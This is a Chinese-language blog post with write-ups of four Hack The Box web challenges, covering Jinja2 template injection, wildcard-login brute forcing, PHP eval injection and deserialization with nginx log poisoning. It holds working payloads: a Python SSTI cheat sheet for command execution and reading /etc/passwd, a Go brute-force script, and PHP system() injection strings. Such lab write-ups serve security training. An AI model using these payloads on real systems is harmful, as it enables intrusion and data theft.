<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="n3ym4r">
    
    <title>
        
            HTB Challenges—Web |
        
        n3ym4r&#39;s blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="/images/logo.svg">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/fontawesome/css/fontawesome.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/fontawesome/css/regular.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/fontawesome/css/solid.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/fontawesome/css/brands.min.css">
    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"zh-CN","path":"search.json"};
    KEEP.theme_config = {"toc":{"enable":true,"number":false,"expand_all":false,"init_open":true},"style":{"primary_color":"#5ed5cc","logo":"/images/logo.svg","favicon":"/images/logo.svg","avatar":"/images/logo.svg","font_size":null,"font_family":null,"left_side_width":"260px","content_max_width":"920px","hover":{"shadow":true,"scale":true},"first_screen":{"enable":true,"header_transparent":false,"background_img":"/images/bg.svg","description":"Pay attention to safety!","font_color":null,"hitokoto":{"enable":true}},"scroll":{"progress_bar":{"enable":false},"percent":{"enable":true}}},"local_search":{"enable":true,"preload":true},"code_copy":{},"code_block_tools":{"enable":true,"style":"mac"},"side_tools":{},"pjax":{"enable":true},"lazyload":{"enable":false},"version":"3.4.9"};
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"};
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <i class="pjax-progress-icon fas fa-circle-notch fa-spin"></i>
    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="/images/logo.svg">
                </a>
            
            <a class="logo-title" href="/">
               n3ym4r&#39;s blog
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                标签
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/links"
                            >
                                友链
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                关于
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/links">友链</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about">关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <span class="title-hover-animation">HTB Challenges—Web</span>
        </div>

        
            <div class="article-header">
                <div class="avatar">
                    <img src="/images/logo.svg">
                </div>
                <div class="info">
                    <div class="author">
                        <span class="name">n3ym4r</span>
                        
                    </div>
                    <div class="meta-info">
                        
<div class="article-meta-info">
    <span class="article-date article-meta-item">
        
            <i class="fa-regular fa-calendar-plus"></i>&nbsp;
        
        <span class="pc">2023-02-04 16:06:14</span>
        <span class="mobile">2023-02-04 16:06</span>
    </span>
    
        <span class="article-update-date article-meta-item">
        <i class="fas fa-file-pen"></i>&nbsp;
        <span class="pc">2023-02-04 16:14:20</span>
    </span>
    
    
    
        <span class="article-tags article-meta-item">
            <i class="fas fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/%E6%89%93%E9%9D%B6/">打靶</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/Web/">Web</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/HTB/">HTB</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fas fa-file-word"></i>&nbsp;<span>1.5k 字</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fas fa-clock"></i>&nbsp;<span>7 分钟</span>
        </span>
    
    
</div>

                    </div>
                </div>
            </div>
        

        <div class="article-content markdown-body">
            <h3 id="Templated"><a href="#Templated" class="headerlink" title="Templated"></a>Templated</h3><p>打开页面，有提示说是Flask&#x2F;jinja2框架搭建，以及靶机标题templated判断为ssti模板注入</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/202323/1.4im6z91nvm2o.webp" alt="1"></p>
<p>输入9测试</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/202323/2.301jhwgrxf40.webp" alt="2"></p>
<p>回显9，确定为ssti模板注入</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/202323/1.4im6z91nvm2o.webp" alt="1"></p>
<pre><code class="shell">http://178.128.171.82:31589/&#123;% for c in [].__class__.__base__.__subclasses__() %&#125;
&#123;% if c.__name__=='_IterationGuard' %&#125;
&#123;&#123; c.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls ').read()") &#125;&#125;
&#123;% endif %&#125;
&#123;% endfor %&#125;
</code></pre>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/202323/3.1ni76dx1e7xc.webp" alt="3"></p>
<p>回显了目录列表，查看flag.txt</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/202323/%E5%9B%BE%E7%89%87.gur26w0x2js.webp" alt="图片"></p>
<p>拿到flag</p>
<p>这里是典型的python-Flask模板注入，一些基础payload：</p>
<pre><code class="python">获得基类
#python2.7
&#39;&#39;.__class__.__mro__[2]
&#123;&#125;.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]
request.__class__.__mro__[1]
#python3.7
&#39;&#39;.__。。。class__.__mro__[1]
&#123;&#125;.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]
request.__class__.__mro__[1]

#python 2.7
#文件操作
#找到file类
[].__class__.__bases__[0].__subclasses__()[40]
#读文件
[].__class__.__bases__[0].__subclasses__()[40](&#39;/etc/passwd&#39;).read()
#写文件
[].__class__.__bases__[0].__subclasses__()[40](&#39;/tmp&#39;).write(&#39;test&#39;)

#命令执行
#os执行
[].__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache下有os类，可以直接执行命令：
[].__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache.os.popen(&#39;id&#39;).read()
#eval,impoer等全局函数
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__下有eval，__import__等的全局函数，可以利用此来执行命令：
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[&#39;__builtins__&#39;][&#39;eval&#39;](&quot;__import__(&#39;os&#39;).popen(&#39;id&#39;).read()&quot;)
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.eval(&quot;__import__(&#39;os&#39;).popen(&#39;id&#39;).read()&quot;)
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.__import__(&#39;os&#39;).popen(&#39;id&#39;).read()
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[&#39;__builtins__&#39;][&#39;__import__&#39;](&#39;os&#39;).popen(&#39;id&#39;).read()

#python3.7
#命令执行
&#123;% for c in [].__class__.__base__.__subclasses__() %&#125;&#123;% if c.__name__=='catch_warnings' %&#125;&#123;&#123; c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;
#文件操作
&#123;% for c in [].__class__.__base__.__subclasses__() %&#125;&#123;% if c.__name__=='catch_warnings' %&#125;&#123;&#123; c.__init__.__globals__['__builtins__'].open('filename', 'r').read() &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;
#windows下的os命令
&quot;&quot;.__class__.__bases__[0].__subclasses__()[118].__init__.__globals__[&#39;popen&#39;](&#39;dir&#39;).r
</code></pre>
<h3 id="Phonebook"><a href="#Phonebook" class="headerlink" title="Phonebook"></a>Phonebook</h3><p>打开页面是一个登录框</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/202323/%E5%9B%BE%E7%89%87.4si1jfuhpd6o.webp" alt="图片"></p>
<p>看到登录框，第一反应为sql注入，试一下万能密码<code>admin&#39; or &#39;1&#39;=&#39;1</code>不行，然后fuzz一下，看有没有SQL注入，没有成功。</p>
<p>尝试通配符登录，用户名密码都填*，登录成功</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/202323/%E5%9B%BE%E7%89%87.uq9cf5sfjqo.webp" alt="图片"></p>
<p>是一个查询用户电话号码的搜索页面，到处瞅瞅页面没啥问题</p>
<p>问题回到那个登录框，将用户名改为页面下留言的Reese，密码为*，登录成功</p>
<p>将用户名改成其他，密码为*，无法登录</p>
<p>也就是说登录用户名确定为Reese，猜测密码即为flag，flag格式为HTB{}，将密码改为H*，发现登录成功，说明猜测没错接下来就是写个脚本爆破出flag值。脚本原理即为一位一位遍历，后面加上一个通配符，前面一位是对的时，会登录成功，否则登录失败。</p>
<p>go脚本如下：</p>
<pre><code class="go">package main

import (
    &quot;bytes&quot;
    &quot;fmt&quot;
    &quot;io/ioutil&quot;
    &quot;net/http&quot;
    &quot;strings&quot;
)

func main() &#123;
    url := &quot;http://144.126.228.187:30674/login&quot;
    client := &amp;http.Client&#123;&#125;
    chars := &quot;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.?!_&#125;&quot;
    flag := &quot;HTB&#123;&quot;
    password := &quot;&quot;
    for i := 0; i &lt; len(chars); i++ &#123;
        password = flag + string(chars[i]) + &quot;*&quot;
        fmt.Printf(&quot;[-] testing %s&quot;, password)
        data := []byte(&quot;username=Reese&amp;password=&quot; + password)
        req, _ := http.NewRequest(&quot;POST&quot;, url, bytes.NewBuffer(data))
        req.Header.Add(&quot;User-Agent&quot;, &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0&quot;)
        req.Header.Add(&quot;Content-Type&quot;, &quot;application/x-www-form-urlencoded&quot;)
        resp, err := client.Do(req)
        if err != nil &#123;
            fmt.Println(&quot;Error:&quot;, err)
        &#125;
        defer resp.Body.Close()

        if resp.StatusCode == 200 &#123;
            bodyBytes, _ := ioutil.ReadAll(resp.Body)
            bodyString := string(bodyBytes)

            if strings.Contains(bodyString, &quot;No search results&quot;) &#123;
                flag += string(chars[i])
                fmt.Println(&quot; success&quot;)
                fmt.Printf(&quot;[+] %s\n&quot;, flag)
                break
            &#125;
        &#125;
        fmt.Println(&quot; failed&quot;)

        if flag[len(flag)-1] == &#39;&#125;&#39; &#123;
            break
        &#125;
    &#125;

    fmt.Printf(&quot;flag: %s\n&quot;, flag)
&#125;
</code></pre>
<h3 id="LoveTok"><a href="#LoveTok" class="headerlink" title="LoveTok"></a>LoveTok</h3><p>题目给了源码，下载下来查看</p>
<p>打开页面，点击最底下的按钮出现format参数，猜测这个参数有利用点，去源码中找到此参数</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/202323/%E5%9B%BE%E7%89%87.1lryxa0xyr9c.webp" alt="图片"></p>
<p>在TimeModel.php中找到了$format</p>
<pre><code class="php">&lt;?php
class TimeModel
&#123;
    public function __construct($format)
    &#123;
        $this-&gt;format = addslashes($format);

        [ $d, $h, $m, $s ] = [ rand(1, 6), rand(1, 23), rand(1, 59), rand(1, 69) ];
        $this-&gt;prediction = &quot;+$&#123;d&#125; day +$&#123;h&#125; hour +$&#123;m&#125; minute +$&#123;s&#125; second&quot;;
    &#125;

    public function getTime()
    &#123;
        eval(&#39;$time = date(&quot;&#39; . $this-&gt;format . &#39;&quot;, strtotime(&quot;&#39; . $this-&gt;prediction . &#39;&quot;));&#39;);
        return isset($time) ? $time : &#39;Something went terribly wrong&#39;;
    &#125;
&#125;
</code></pre>
<p>这里用了addslashes()——– 使用反斜线引用字符串</p>
<p>注意下面有个eval()函数，将$this-&gt;format包含在了里面，也就意味着，我们可以控制format的值来进行eval()执行代码。</p>
<p>所以，第一步绕过addslashes()的转义</p>
<p>使用php复杂变量进行绕过</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://www.programmersought.com/article/30723400042/" >https://www.programmersought.com/article/30723400042/<i class="fas fa-external-link-alt"></i></a></p>
<p>简单来说，${phpinfo()}，会先执行phpinfo(),然后将返回值作为变量名</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/202323/%E5%9B%BE%E7%89%87.nuivar33scw.webp" alt="图片"></p>
<p>这里“还是会被转义，所以需要换个方式，不使用到这些字符</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/202323/%E5%9B%BE%E7%89%87.1ugzjeexni68.webp" alt="图片"></p>
<pre><code>?format=$&#123;system($_GET[1])&#125;&amp;1=ls
</code></pre>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/202323/%E5%9B%BE%E7%89%87.46cs2jdwnw5c.webp" alt="图片"></p>
<pre><code>?format=$&#123;system($_GET[1])&#125;&amp;1=ls /
</code></pre>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/202323/%E5%9B%BE%E7%89%87.2w67qo8eijeo.webp" alt="图片"></p>
<pre><code>?format=$&#123;system($_GET[1])&#125;&amp;1=cat /flagLpfG2
</code></pre>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/202323/%E5%9B%BE%E7%89%87.4p3nh0peeo74.webp" alt="图片"></p>
<p>拿到flag，这就是一道php命令执行的题。</p>
<h3 id="Toxic"><a href="#Toxic" class="headerlink" title="Toxic"></a>Toxic</h3><p>给了源码</p>
<pre><code class="php">&lt;?php
spl_autoload_register(function ($name)&#123;
    if (preg_match(&#39;/Model$/&#39;, $name))
    &#123;
        $name = &quot;models/$&#123;name&#125;&quot;;
    &#125;
    include_once &quot;$&#123;name&#125;.php&quot;;
&#125;);

if (empty($_COOKIE[&#39;PHPSESSID&#39;]))
&#123;
    $page = new PageModel;
    $page-&gt;file = &#39;/www/index.html&#39;;

    setcookie(
        &#39;PHPSESSID&#39;, 
        base64_encode(serialize($page)), 
        time()+60*60*24, 
        &#39;/&#39;
    );
&#125; 

$cookie = base64_decode($_COOKIE[&#39;PHPSESSID&#39;]);
unserialize($cookie);
</code></pre>
<p>这里可以看到，cookie是文件读取目录经过序列化之后再进行base64编码后生成的</p>
<p>抓个包</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.3xz33hpf17s0.webp" alt="image"></p>
<p>decode</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.411nsshh24s0.webp" alt="image"></p>
<p>所以我们可以逆向去读取敏感文件</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.1l1z4err9l40.webp" alt="image"></p>
<p>成功读取</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.3fshwjbmt7u0.webp" alt="image"></p>
<p>注意到最后一行，nginx，想到日志文件包含</p>
<p>nginx的log在&#x2F;var&#x2F;log&#x2F;nginx&#x2F;access.log和&#x2F;var&#x2F;log&#x2F;nginx&#x2F;error.log，其中access.log可以打开。</p>
<p>尝试读一下</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.64rtjiwmtp8.webp" alt="image"></p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.3mb8h84nni00.webp" alt="image"></p>
<p>可以看到日志文件为请求头文件</p>
<p>那么我们可以将请求头中的User-Agent字段更改为恶意代码，这样就会自动写入日志文件中，然后被执行。</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.rrtipquzvio.webp" alt="image"></p>
<p>再次访问日志文件，之前更改了ua的访问已经被记录</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.6z1mt4n561c0.webp" alt="image"></p>
<p>php代码也已经被执行，回显了flag</p>

        </div>

        
            <div class="post-copyright-info">
                <div class="article-copyright-info-container">
    <ul class="copyright-info-content">
        <li>本文标题：HTB Challenges—Web</li>
        <li>本文作者：n3ym4r</li>
        <li>创建时间：2023-02-04 16:06:14</li>
        <li>
            本文链接：https://n3ym4r.github.io/2023/02/04/HTB Challenges—Web/
        </li>
        <li>
            版权声明：本博客所有文章除特别声明外，均采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> 许可协议。转载请注明出处！
        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box">
                
                    <li class="tag-item">
                        <a href="/tags/%E6%89%93%E9%9D%B6/">#打靶</a>&nbsp;
                    </li>
                
                    <li class="tag-item">
                        <a href="/tags/Web/">#Web</a>&nbsp;
                    </li>
                
                    <li class="tag-item">
                        <a href="/tags/HTB/">#HTB</a>&nbsp;
                    </li>
                
            </ul>
        

        
            <div class="article-nav">
                
                    <div class="article-prev">
                        <a class="prev"
                           rel="prev"
                           href="/2023/02/05/Photobomb%E9%9D%B6%E6%9C%BA/"
                        >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                            <span class="title flex-center">
                                <span class="post-nav-title-item">Photobomb靶机</span>
                                <span class="post-nav-item">上一篇</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next">
                        <a class="next"
                           rel="next"
                           href="/2023/02/03/Archetype%E9%9D%B6%E6%9C%BA/"
                        >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">Archetype靶机</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                            <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        

        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            
<footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
                <span>2020</span> -
            
            2023
            
                &nbsp;<i class="fas fa-heart icon-animate"></i>
                &nbsp;<a href="/">n3ym4r</a>
            
        </div>
        
        <div class="theme-info info-item">
            由 <a target="_blank" href="https://hexo.io">Hexo</a> 驱动&nbsp;|&nbsp;主题
            &nbsp;
            <a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.4.9</a>
        </div>
        
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item page-aside-toggle">
                <i class="fas fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-expand-width flex-center">
            <i class="fas fa-up-right-and-down-left-from-center"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
    </ul>
</div>

    </div>

    
        <aside class="page-aside">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#Templated"><span class="nav-text">Templated</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Phonebook"><span class="nav-text">Phonebook</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#LoveTok"><span class="nav-text">LoveTok</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Toxic"><span class="nav-text">Toxic</span></a></li></ol>
    </div>
</div>
        </aside>
    

    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>



<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/dark-light-toggle.js"></script>




    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/local-search.js"></script>



    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/code-block-tools.js"></script>




<div class="post-scripts pjax">
    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/left-side-toggle.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/libs/anime.min.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/toc.js"></script>
    
</div>


    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/libs/pjax.min.js"></script>
<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            KEEP.refresh();
        });
    });
</script>



</body>
</html>
